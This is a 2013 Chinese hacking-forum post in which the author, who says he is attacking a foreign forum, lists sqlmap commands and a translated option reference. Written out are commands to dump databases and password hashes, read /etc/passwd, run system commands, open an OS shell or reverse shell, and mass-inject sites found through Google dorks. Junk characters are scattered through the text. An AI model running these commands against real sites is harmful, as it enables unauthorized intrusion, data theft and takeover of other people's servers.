中国网络渗透测试联盟

标题: sqlmap注入命令的使用方法 [打印本页]

作者: admin    时间: 2013-4-4 22:26
标题: sqlmap注入命令的使用方法
今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、
4 }0 }. q+ c  t% j& ?) f  Rsqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称
1 c" t  k) M$ s: N4 p) E# Qsqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名8 M: ]( P! o; B: u0 D. M- O
sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
. x' g) Q) i4 N& ]1 s
* S3 e( ~! j3 ?sqlmap  -u  “http://url/news?id=1″  –dump  -C  “column_name”  -T “table_name”-D “db_name”-v
" E* G5 }) p9 B. q  Z, B0 #获取字段内容
5 c! Q; _: @0 v5 K' c! a8 u  E; i
7 r* S9 [2 S4 Q******************信息获取******************1 k. A6 _' o6 P, q+ k. s6 W
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型+ |2 u$ s7 b1 h% N
sqlmap -u “http://url/news?id=1″ –users #列数据库用户
8 I( r( S9 x  O' w; d+ {( A: [6 vsqlmap -u “http://url/news?id=1″ –dbs#列数据库& E# U7 f/ B  B9 U
sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码
1 R* N/ C1 A/ s! L4 G3 ssqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码0 G, u: V3 i# o, D. j
sqlmap  -u  “http://url/news?id=1″   –dump  -C  “password,user,id”  -T “tablename”-D “db_name”7 }, v9 H- t2 V& b- N% Q
–start 1 –stop 20 #列出指定字段,列出20 条& b$ x8 a, x5 v, T. |& [
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表
9 v* I0 u" Z+ |" Z2 B4 Nsqlmap -u “http://url/news?id=1″ –privileges #查看权限
. w0 C+ E  e: h9 rsqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
" `. ]( g& b, u  gsqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)
( d# b) {$ I( P# k# g7 Lsqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表+ ~$ f. U# c0 |( h
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
5 W5 N! ~" C7 psqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
7 v& u$ K4 D# q: D! K: g/ bsqlmap -u “http://url/news?id=1″-b #获取banner信息! w* d6 J7 P, b; t% L& I
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入8 y* D* u3 D9 A  W8 C' h
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型$ i! Q) g& N1 u, \# c
sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入
1 r+ ?3 u. \! h) r% Fsqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词" V% J. `+ @' _
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
; `9 O2 O  L+ \sqlmap -u “http://url/news?id=1″ –file /etc/passwd1 H! _0 @/ X/ D- c
sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令4 n9 h/ L& W( i2 _1 K- |/ N
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
$ w3 M" G2 x- @sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表4 b# e  x% z5 D6 A! V$ a
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
( ?1 O" A( `5 }" J; Wsqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度
2 {( A, \1 b% i" o***********高级用法*************
6 z* D: k+ L( S, Q: f# H" ]# l4 X-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
( y, J& |+ Y* k" H$ V& q: Msqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段          需保证google.com能正常访问5 z. U% @9 g: u
–technique   测试指定注入类型\使用的技术
0 [8 M8 i; K! O6 t  L  O. N不加参数默认测试所有注入技术9 v% |6 M  @; }& ?1 U0 n" j
•     B: 基于布尔的SQL 盲注
% @8 T& E+ Y2 x- ?2 }•     E: 基于显错sql 注入/ Y2 [2 U: H( U5 ]! }
•     U: 基于UNION 注入" m4 A2 }9 e( c/ a3 E
•     S: 叠层sql 注入; ~8 c; e& o4 @4 f$ k' ~/ @) {
•     T: 基于时间盲注/ I6 L( p7 A: `; P9 \( w
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
  H# \7 g7 f9 T2 k# B3 `' M, P" N–tamper 插件所在目录
' Q9 o6 f8 H% l8 B" X' M\sqlmap-dev\tamper
$ b+ K; l% ?( m& J, _! rsqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能, e! S; v% f6 I0 ~* N1 c, Z
level 执行测试等级 攻击实例:! f8 o$ }/ ?$ ?5 L7 U
Sqlmap -u “http://url/news?id=1&Submit=Submit”% o- Y0 Z' z4 b; P
–cookie=”PHPSESSID=41aa833e6d0d* G) M$ c- R& l8 X6 J
28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user
3 g5 K6 s  C" J9 p0 i& K! e% q–password
* [! q6 J, S. ~$ Z参考文档:http://sqlmap.sourceforge.net/doc/README.html
. T3 o% Q5 s7 c- Z/ b# |$ g9 F***********安装最新版本*************
0 I+ b$ f  H: s0 Y) z. J8 pubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
+ \* f& A1 j; I; ^' |' A' msudo   svn   checkout   https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev$ y" {# E+ {- e: E, g" d3 E$ T
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件7 m5 j( v. l# m6 p+ v
sudo vim /home/当前用户/.bashrc
6 c. p" d6 e3 i' P6 ^2 {#任意位置加上:" ]# n+ O! X& E) I/ o0 K
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效
' C' w  T# C5 `. G如果想对所有用户有效 可设置全局 编辑下面的文件9 e/ v  A! ~" Y# N& q  d
vim /etc/profile
' [1 W8 D2 ?/ y, G1 q" s同样加上:
, K, X) \1 K* Galias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
! e5 d/ j/ R1 g" \$ \" C9 G, o******************windows 7 (x64) sqlmap install (SVN)************
7 x$ |' u7 m8 ^http://www.python.org/getit/ 安装python; \6 v# j) ?5 o& ]
http://www.sliksvn.com/en/download 安装windows svn client
" O9 I6 N6 w/ c2 m: x9 ]7 tsvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
8 r# Q1 _6 W9 M6 {安装sqlmap' y* K9 j) \; [* b
*修改环境变量( W% ]0 g: N8 y8 F. C' ~% y) F- ?
–version             显示程序的版本号并退出
( f% m* ~, E+ o/ I-h, –help            显示此帮助消息并退出
; O. c% ~& D) J/ R9 D5 O* j-v VERBOSE            详细级别:0-6(默认为1)
0 X8 y- o# P- h7 {% x7 t) _3 ]7 |Target(目标): 以下至少需要设置其中一个选项,设置目标URL。
/ d3 Y, o# D0 P4 f2 p' g# o-d DIRECT           直接连接到数据库。9 D3 q+ Y' p8 P# T
-u URL, –url=URL   目标URL。. J2 E! c3 m2 e. \  S+ K4 }% G- h
-l LIST             从Burp 或WebScarab 代理的日志中解析目标。( X$ P# q; A8 u
-r REQUESTFILE      从一个文件中载入HTTP 请求。
8 d  S( F# }" Z-g GOOGLEDORK       处理Google dork 的结果作为目标URL。
( ^; r" y' y) O0 c/ l% x' V' [-c CONFIGFILE       从INI 配置文件中加载选项。, H% K4 n+ c% l! A4 j
Request(请求)::$ A2 f% h) K( o
这些选项可以用来指定如何连接到目标URL。
' m# |$ b4 S& [2 L9 q9 H4 L6 _–data=DATA         通过POST 发送的数据字符串
" \% T# B& m5 R/ p8 ^$ ?–cookie=COOKIE     HTTP Cookie 头. c! k; N4 p, T; X3 C- J8 n4 K
–cookie-urlencode  URL 编码生成的cookie 注入
3 m2 ]5 u$ j) h: R2 F4 f( y9 e* D–drop-set-cookie   忽略响应的Set –Cookie 头信息0 F* B( p6 v, [% e- b- [' n

2 d2 C1 s5 m- C* y, M–user-agent=AGENT  指定  HTTP User –Agent 头
. L. D0 D. \4 t–random-agent      使用随机选定的HTTP User –Agent 头, T" }1 ]1 ^& {9 W$ q7 E1 l4 s) ?
–referer=REFERER   指定  HTTP Referer 头7 k: c1 L! a, o$ m9 n7 I/ I+ v- a
–headers=HEADERS   换行分开,加入其他的HTTP 头
8 |6 J6 x( @0 p: N9 T, B–auth-type=ATYPE   HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
/ J3 v6 B: z3 t/ Q2 a–auth-cred=ACRED   HTTP 身份验证凭据(用户名:密码)4 A, M3 A5 a$ Q$ ]0 n5 I' p
–auth-cert=ACERT   HTTP 认证证书(key_file,cert_file)9 V  L) y3 H( `6 u' ]# @' Z
–proxy=PROXY       使用HTTP 代理连接到目标URL
  [0 k: w. q" c' J" \–proxy-cred=PCRED  HTTP 代理身份验证凭据(用户名:密码)) i2 Q! I% z( x! @: y9 w( H4 t
–ignore-proxy      忽略系统默认的HTTP 代理
$ l/ S6 M# u) [5 x' F3 E. ~–delay=DELAY       在每个HTTP 请求之间的延迟时间,单位为秒
, n6 u: s5 `) |0 t: \8 B/ T–timeout=TIMEOUT   等待连接超时的时间(默认为30 秒)) w3 C6 k& M! K( {7 v: r
–retries=RETRIES   连接超时后重新连接的时间(默认3)( R& A# Y& u: e: G  ]* w2 {
–scope=SCOPE       从所提供的代理日志中过滤器目标的正则表达式
/ K4 k! B7 T! m% p) V–safe-url=SAFURL   在测试过程中经常访问的url 地址
6 Y" C4 V; F+ o- a* \. n  o  I–safe-freq=SAFREQ  两次访问之间测试请求,给出安全的URL
9 S: ?* O* w4 |  v& P( `Optimization(优化): 这些选项可用于优化SqlMap 的性能。
% Z+ K7 @& G; g" @  j3 [# B0 S; n-o                  开启所有优化开关! G8 b/ M) n- ^6 d0 e4 s
–predict-output    预测常见的查询输出! j, K# d& k& s" ?
–keep-alive        使用持久的HTTP(S)连接
7 {! j* ?' P2 O6 x–null-connection   从没有实际的HTTP 响应体中检索页面长度
7 s# T/ \% D! [' ^: L* w2 o3 l( X9 a–threads=THREADS   最大的HTTP(S)请求并发量(默认为1), R1 h8 a7 p+ G& p& N; W
Injection(注入):6 X+ l4 O& |3 [) w
这些选项可以用来指定测试哪些参数,  提供自定义的注入payloads 和可选篡改脚本。
" `6 Y2 Q( c7 k- |; w-p TESTPARAMETER    可测试的参数(S)( g% o: e( e' ^- G2 r
–dbms=DBMS         强制后端的DBMS 为此值7 q: r, ], \0 p* u( B. S
–os=OS             强制后端的DBMS 操作系统为这个值
& @1 D3 Z/ D& _–prefix=PREFIX     注入payload 字符串前缀( l" m6 |/ a+ ~) j' _
–suffix=SUFFIX     注入 payload 字符串后缀
9 n2 o+ F" U# b8 r, n–tamper=TAMPER     使用给定的脚本(S)篡改注入数据. |& q; M0 o8 L- @6 l4 S7 C8 l9 |
Detection(检测):
2 [% t8 d- F# a  x3 r/ h这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。
6 [9 y% G" }2 d8 ~3 J* O* d/ e9 g–level=LEVEL       执行测试的等级(1-5,默认为1)* |( N/ c- R# G/ G: N
–risk=RISK         执行测试的风险(0-3,默认为1)$ u; b- x! l  b. H! |4 n0 Z
–string=STRING     查询时有效时在页面匹配字符串
4 K! d! V; v, w0 G+ _# C+ q–regexp=REGEXP     查询时有效时在页面匹配正则表达式; I5 \9 E0 V( d0 U
–text-only         仅基于在文本内容比较网页
! j9 ?8 y6 @/ q5 E; jTechniques(技巧): 这些选项可用于调整具体的SQL 注入测试。# m& R7 x, n/ R2 o5 K6 R
–technique=TECH    SQL 注入技术测试(默认BEUST)
3 P! {! u1 d# W# ^/ V9 W0 s–time-sec=TIMESEC  DBMS 响应的延迟时间(默认为5 秒)
) F5 A: M+ H2 p! C9 e( Q* F–union-cols=UCOLS  定列范围用于测试UNION 查询注入
! F  }. i+ ?" z& N$ Z+ B–union-char=UCHAR  用于暴力猜解列数的字符$ P2 p7 b- G% q+ y
Fingerprint(指纹):* m8 p* r/ S% D, a
-f, –fingerprint     执行检查广泛的DBMS 版本指纹. d# }! O. c; ~) m* U+ n
Enumeration(枚举):7 R9 f: I6 ]9 x! ?

; o: Y, K7 N& i. ]这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
' G- q% y1 h" t: H8 ~/ O7 |-b, –banner        检索数据库管理系统的标识, \" F0 ]3 p  D" o6 p; t+ N6 e
–current-user      检索数据库管理系统当前用户$ L6 }  g% i* D% ~3 A6 y$ d" V/ ~) r
–current-db        检索数据库管理系统当前数据库( \& `1 |0 ^' X+ H! T
–is-dba            检测DBMS 当前用户是否DBA
' I3 U5 r- }3 L& t2 R  R–users             枚举数据库管理系统用户, I1 }- B7 J; H% p; _6 k& ?6 n
–passwords         枚举数据库管理系统用户密码哈希
2 k( m8 n- z( T7 C* M& G" f6 p2 P–privileges        枚举数据库管理系统用户的权限$ a  W6 l% L0 }. ^( Z% D
–roles             枚举数据库管理系统用户的角色, O  e2 I) l  w' C/ }/ X0 l. a0 ^% K8 Z
–dbs               枚举数据库管理系统数据库
( y2 C( B- J0 s–tables            枚举的DBMS 数据库中的表
0 E1 |, @& b; Y; e& K–columns           枚举DBMS 数据库表列& Y% U7 O. O4 M5 f' g9 u
–dump              转储数据库管理系统的数据库中的表项
' S8 b/ P2 h. {6 R2 j$ I! [  R–dump-all          转储所有的DBMS 数据库表中的条目6 ]- J! l- y* j6 ~
–search            搜索列(S),表(S)和/或数据库名称(S)! V* P1 R# Z6 d7 @2 x. P8 c5 y5 P
-D DB               要进行枚举的数据库名2 _+ s* o3 ~2 l, J2 H& m
-T TBL              要进行枚举的数据库表
" \3 u+ o9 m. z2 b, m) f/ ]. J-C COL              要进行枚举的数据库列2 @+ n& \1 I- W! K# S# l3 Y, A( m
-U USER             用来进行枚举的数据库用户
) j; ~1 }  P: P2 U- Y7 x  d7 r* ~2 E–exclude-sysdbs    枚举表时排除系统数据库% N) S. f& W4 t' x% `3 Z
–start=LIMITSTART  第一个查询输出进入检索
0 A" R( U+ k6 o8 W! w- L–stop=LIMITSTOP    最后查询的输出进入检索
/ A) [4 X( G. ?0 |8 U–first=FIRSTCHAR   第一个查询输出字的字符检索; G5 n  u1 g7 s# w, v. t$ k
–last=LASTCHAR     最后查询的输出字字符检索, q& I" \) Y7 r
–sql-query=QUERY   要执行的SQL 语句- h! F+ P8 H4 v4 q+ j* Y
–sql-shell         提示交互式SQL 的shell
* A2 P- [1 {0 G8 M3 J" S- N$ oBrute force(蛮力): 这些选项可以被用来运行蛮力检查。( O5 |/ ]0 l! }
–common-tables     检查存在共同表$ S+ {) W% ]! k1 r5 j/ K& r/ ^& n
–common-columns    检查存在共同列* M7 b9 Y/ G( I& N* \* p
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
4 j: i7 O) A: V2 ~& D–udf-inject        注入用户自定义函数0 V% T- Q8 F8 Q* w& B! u/ Z+ h- c- _# L
–shared-lib=SHLIB  共享库的本地路径
. ?- v) i/ W7 F7 @* ?$ lFile system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。( e8 S( p) d3 [/ X7 p; x9 N
–file-read=RFILE   从后端的数据库管理系统文件系统读取文件$ r# X3 F1 x$ p$ K! X% ]: o! m
–file-write=WFILE  编辑后端的数据库管理系统文件系统上的本地文件
* P# m$ W$ O$ b5 |3 s: ^" `0 i–file-dest=DFILE   后端的数据库管理系统写入文件的绝对路径
8 W- V, C4 b  R- H' Q5 {9 POperating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。7 \! j. b' D' M+ e& L; Y
–os-cmd=OSCMD      执行操作系统命令& [+ ?" K+ r  s% d
–os-shell          交互式的操作系统的shell
% u$ j; e7 W; R# ?7 q  O3 }& o* k9 I–os-pwn            获取一个OOB shell,meterpreter 或VNC
# a! z4 o# v+ f0 w, `. ?; m3 P& Y+ e–os-smbrelay       一键获取一个OOB shell,meterpreter 或VNC2 @6 `" _4 K6 a# A
–os-bof            存储过程缓冲区溢出利用
8 |; A' z" v: Y& r! n) Y–priv-esc          数据库进程用户权限提升
8 G$ n' |2 W0 Q6 J–msf-path=MSFPATH  Metasploit Framework 本地的安装路径
! z$ `' P- E4 c! w; G4 k/ k! U: \–tmp-path=TMPPATH  远程临时文件目录的绝对路径. q" u4 s% j3 J0 B' a, n

  v. n& E, u& T( jWindows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。7 E8 e5 P( s1 D  I" E
–reg-read          读一个Windows 注册表项值( @1 h) P4 H% A' U
–reg-add           写一个Windows 注册表项值数据
/ B0 h2 n7 h6 y. D0 W: S0 v–reg-del           删除Windows 注册表键值5 p+ _* d" I  V! P; U1 A
–reg-key=REGKEY    Windows 注册表键
2 \7 l2 e+ ?0 \6 U$ H! z–reg-value=REGVAL  Windows 注册表项值: j1 O9 h% |& ]1 _; M0 \
–reg-data=REGDATA  Windows 注册表键值数据
4 i3 h) d9 z1 Z' ~5 @3 w, Q8 p–reg-type=REGTYPE  Windows 注册表项值类型
+ X2 G' W- l2 j3 q2 ]! k0 QGeneral(一般): 这些选项可以用来设置一些一般的工作参数。
) y; h' I" W5 R  \-t TRAFFICFILE      记录所有HTTP 流量到一个文本文件中/ C$ i/ }! g3 Q, h3 U5 k
-s SESSIONFILE      保存和恢复检索会话文件的所有数据
1 O9 R0 ~2 o2 ]- D–flush-session     刷新当前目标的会话文件
, a# ~$ Q; ^' Q0 H- [$ f3 t' k–fresh-queries     忽略在会话文件中存储的查询结果+ \) Z6 q. p* b) _# G8 S: S
–eta               显示每个输出的预计到达时间! f& a/ d! }3 n
–update            更新SqlMap5 p- l1 ]  x5 p1 ~5 D
–save              file 保存选项到INI 配置文件
7 N3 y" T5 L3 n- M( M$ T" F–batch             从不询问用户输入,使用所有默认配置。
7 {3 O* Q; h7 ^& JMiscellaneous(杂项):1 H- Y! K, b- M5 j' m' S
–beep              发现SQL 注入时提醒
5 U2 r- ]& s: ?  Q  E( ~; z( ]# g–check-payload     IDS 对注入payloads 的检测测试
& `0 L3 I2 i1 T& H6 {–cleanup           SqlMap 具体的UDF 和表清理DBMS1 _; l9 h- ^- j1 \2 q! X
–forms             对目标URL 的解析和测试形式5 c% ~: B$ M  ^5 K
–gpage=GOOGLEPAGE  从指定的页码使用谷歌dork 结果
# y! q9 c+ X5 L# W# P–page-rank         Google dork 结果显示网页排名(PR)( }: h& Z/ N/ ]3 U  g
–parse-errors      从响应页面解析数据库管理系统的错误消息
& i! y4 S' Y8 d, z9 m0 {- P9 ~0 l–replicate         复制转储的数据到一个sqlite3 数据库' `$ _. f8 r" T, Q' b! m& b
–tor               使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址! w) O' Y) B) c( q" q" r- L' B
–wizard            给初级用户的简单向导界面




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2